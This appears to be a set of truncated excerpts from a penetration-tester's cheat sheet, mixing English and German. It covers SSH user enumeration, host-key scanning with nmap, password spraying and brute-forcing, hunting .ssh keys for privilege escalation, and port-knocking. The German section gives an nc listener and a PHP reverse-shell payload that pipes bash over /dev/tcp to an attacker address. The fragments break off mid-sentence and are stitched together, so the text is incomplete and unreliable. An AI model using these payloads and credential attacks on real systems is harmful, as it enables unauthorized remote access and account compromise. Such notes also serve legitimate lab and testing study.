-
Notes If the server needs old crypto, use -oKexAlgorithms=+diffie-hellman-group1-sha1 OpenSSH 7.7. allows to enumerate existing users. It could be possible on Windows 10 ssh-agent to extract the keys. Keys Get fingerprints nmap -p22 --script ssh-hostkey $target Get hostkeys nmap -p22 --script ssh-hostkey --script-args ssh_hostkey=full $target Extract fingerprints from existing key file: ssh-keygen -E md5 -lf /tmp/found_keyssh-keygen -E sha1…
-
Enumeration Mandatory Try to access ssh ‑v $target Optional Reuse existing credentials Brute-force with existing usernames (Password-spraying) Try ssh-audit $target Try known usernaes with username as password or other found strings. Privilege Escalation Find .ssh directory on the file system and check all files within. Check sshd_config file. Check SSH version for exploits.
-
(!) See also Password spraying to check a obtained password against usernames. Note: Use http://rumkin.com/tools/cipher/ if you have to encode/decrypt/decipher something on the fly. Wordlist optimization If there is a password policy known: Check password policy In Windows, type net accounts to get informations about account locking, lockout threasholds etc. Cloud-based performance cracking See NPK Default passwords Hashcat Am…
-
IF THE METERPRETER SHELL STUCKS, TRY TO ENTER ENTER MULTIPLE TIMES ON THE VICTIM. Aufbauen Lausche auf einem System, dass erreicht werden kann z.B. mit nc -lnvp 9998 [l=listen,v=verbose,p=port,n=no_resolution] Initiiere dann die Verbindung vom Zielsystem. Hier ein Beispiel direkt in PHP: <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); ?> Anderes Beispiel, z.B. direkt in einer Konsole…
-
With knockd a server can be configured to respond only after some ports were checked before. Its often used for SSH. Coutermeasure: Sniff traffic and wait for an user to login and reconstruct the knocking pattern out of the pcaps.